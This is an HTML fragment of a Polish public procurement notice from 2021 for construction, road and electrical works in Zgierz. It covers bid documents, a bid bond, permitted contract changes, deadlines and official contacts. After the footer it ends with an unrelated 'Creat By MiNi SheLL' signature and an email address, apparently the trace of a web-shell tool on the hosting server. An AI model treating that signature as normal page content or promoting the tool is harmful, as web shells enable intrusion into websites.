z<br/>rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce<br/>zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem; Wykaz robót<br/>budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca<br/>wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów<br/>określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie<br/>uzyskać tych dokumentów – inne odpowiednie dokumenty, dotyczy robót budowlanych<br/>odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia<br/>(„związanych z przedmiotem zamówienia”), tj.: roboty budowlano-konstrukcyjne, drogowe i elektryczne; Wykaz<br/>osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności<br/>odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z<br/>informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informacją o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo do reprezentowania w postępowaniu o udzielenie zamówienia –w<br/>szczególności – do podpisania oferty wraz z załącznikami – o ile nie wynika ono z innych<br/>dokumentów załączonych przez Wykonawcę. Dowód, w szczególności zobowiązanie innych<br/>podmiotów do oddania do dyspozycji niezbędnych zasobów, jeśli Wykonawca polega na tych<br/>zasobach. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Oferta powinna być zabezpieczona wadium w wysokości: 7.000,00 zł, słownie złotych: siedem<br/>tysięcy 00/100, wniesionym przed upływem terminu składania ofert i obejmującym okres<br/>związania ofertą, tj. okres rozpoczynający się wraz z upływem terminu składania ofert do dnia<br/>13.07.2021 r. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:<br/>Bank Spółdzielczy w Zgierzu 39 8783 0004 0024 6929 2000 0005.UWAGA: Terminem<br/>wniesienia wadium w formie pieniężnej jest termin uznania kwoty na rachunku Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia winni złożyć pełnomocnictwo<br/>do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy, o ile nie wynika ono z innych dokumentów załączonych przez<br/>Wykonawcę, np. z umowy konsorcjum. 2 Pełnomocnictwo, o którym mowa w pkt. 1, powinno<br/>wskazywać wszystkich Wykonawców, którzy wspólnie ubiegają się o udzielenie zamówienia<br/>publicznego, a także zawierać deklarację (podpisy) wszystkich mocodawców, co do<br/>ustanowienia pełnomocnika. 3. Spółka cywilna ubiegająca się o udzielenie zamówienia nie ma<br/>obowiązku powoływania pełnomocnika i może być reprezentowana przez wspólników - każdego<br/>wspólnika - na ogólnych zasadach reprezentacji spółki cywilnej, zgodnie z przepisami Kodeksu<br/>cywilnego, chyba że umowa lub uchwała wspólników stanowi odmiennie. 4. Jeżeli została<br/>wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, zamawiający<br/>może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych Wykonawców. [art. 59 PZP] W przypadku potwierdzenia spełnienia<br/>przez Wykonawcę wspólnie ubiegającego się o udzielenie zamówienia warunków dotyczących:<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, wykształcenia,<br/>kwalifikacji zawodowych lub doświadczenia – Wykonawca ten winien złożyć oświadczenie w<br/>trybie art. 117 ust. 4 PZP, którego treść została podana w pkt. 10 druku oferty <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Stosownie do treści art. 455 ust. 1 PZP dopuszczalna jest zmiana umowy: 1) niezależnie od<br/>wartości tej zmiany, o ile została przewidziana w ogłoszeniu o zamówieniu lub dokumentach<br/>zamówienia, w postaci jasnych, precyzyjnych i jednoznacznych postanowień umownych, które<br/>mogą obejmować postanowienia dotyczące zasad wprowadzania zmian wysokości ceny, jeżeli<br/>spełniają one łącznie następujące warunki: a) określają rodzaj i zakres zmian, b) określają<br/>warunki wprowadzenia zmian, c) nie przewidują takich zmian, które modyfikowałyby ogólny<br/>charakter umowy; 2) gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę: a)<br/>jeżeli taka możliwość została przewidziana w postanowieniach umownych, o których mowa wpkt<br/>1, lub b) w wyniku sukcesji, wstępując w prawa i obowiązki Wykonawcy, w następstwie<br/>przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub<br/>nabycia dotychczasowego Wykonawcy lub jego przedsiębiorstwa, o ile nowy Wykonawca<br/>nie pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia<br/>stosowania przepisów ustawy, lub c) w wyniku przejęcia przez Zamawiającego zobowiązań<br/>Wykonawcy względem jego Podwykonawców, w przypadku, o którym mowa w art. 465 ust. 1<br/>PZP; 3) jeżeli dotyczy realizacji, przez dotychczasowego Wykonawcę, dodatkowych dostaw,<br/>usług lub robót budowlanych, których nie uwzględniono w zamówieniu podstawowym, o ile stały<br/>się one niezbędne i zostały spełnione łącznie następujące warunki: a) zmiana Wykonawcy nie<br/>może zostać dokonana z powodów ekonomicznych lub technicznych, w szczególności<br/>dotyczących zamienności lub interoperacyjności wyposażenia, usług lub instalacji zamówionych<br/>w ramach zamówienia podstawowego, b) zmiana Wykonawcy spowodowałaby istotną<br/>niedogodność lub znaczne zwiększenie kosztów dla Zamawiającego, c) wzrost ceny<br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy, z<br/>wyjątkiem należycie uzasadnionych przypadków; 4) jeżeli konieczność zmiany umowy<br/>spowodowana jest okolicznościami, których Zamawiający, działając z należytą starannością, nie<br/>mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru umowy a wzrost ceny<br/>spowodowany każdą kolejną zmianą nie przekracza 50% wartości pierwotnej umowy. 2.<br/>Dopuszczalne są również zmiany umowy których łączna wartość jest mniejsza niż progi unijne<br/>oraz jest niższa niż 15%, w przypadku zamówień na roboty budowlane, a zmiany te nie<br/>powodują zmiany ogólnego charakteru umowy. 3. W przypadkach, o których mowa w ust. 1 pkt<br/>3 i 4, Zamawiający: 1) nie może wprowadzać kolejnych zmian umowy w celu uniknięcia<br/>stosowania przepisów ustawy; 2) po dokonaniu zmiany umowy, zamieszcza ogłoszenie o<br/>zmianie umowy w Biuletynie Zamówień Publicznych lub przekazuje Urzędowi Publikacji Unii<br/>Europejskiej. 4. Jeżeli umowa zawiera postanowienia dotyczące zasad wprowadzania zmian<br/>wysokości cen, dopuszczalną wartość zmiany ceny, o której mowa w ust. 1 pkt 3 lit. c i pkt 4, lub<br/>dopuszczalną wartość zmiany umowy, o której mowa w ust. 2, ustala się w oparciu o zmienioną<br/>cenę. 5. Stosownie do treści art. 454. ust. 1 PZP nie jest dopuszczalna istotna zmiana zawartej<br/>umowy z wyjątkiem przypadków wskazanych w powyższych ust. 1 do 3, przy czym zmiana<br/>umowy jest istotna, jeżeli powoduje, że charakter umowy zmienia się w sposób istotny w<br/>stosunku do pierwotnej umowy, w szczególności jeżeli zmiana: 1) wprowadza warunki, które<br/>gdyby zostały zastosowane w postępowaniu o udzielenie zamówienia, to wzięliby w nim udział<br/>lub mogliby wziąć udział inni Wykonawcy lub przyjęte zostałyby oferty innej treści; 2) narusza<br/>równowagę ekonomiczną stron umowy na korzyść Wykonawcy, w sposób nieprzewidziany w<br/>pierwotnej umowie; (...) pełny tekst znajduje się w § 15 Ogólnych warunków umowy, stanowiących załącznik nr 29.2.b do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-15 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/umz.zgierz</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-15 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-13</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Wszystkie kryteria, tj.: - cena, - okres gwarancji (całkowity, ale nie dłuższy niż 10 lat), - wysokość kar umownych, - zatrudnienie min. 1 osoby niepełnosprawnej lub bezrobotnej <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Osobami uprawnionymi do porozumiewania się z Wykonawcami są: w sprawach<br/>merytorycznych: 1) Alina Zawadzka, z-ca naczelnika, pok. nr 203, tel.: (42) 714-38-20; 2) Krzysztof Łobodziński, naczelnik, pok. nr 212, tel.: (42)714-31-12 ; w sprawach proceduralnych: 1) Klaudia Bukowiecka, tel.: (42) 716-21-49, 2) Anna Warda-Walczyk, tel. 609-219-300</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-31 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com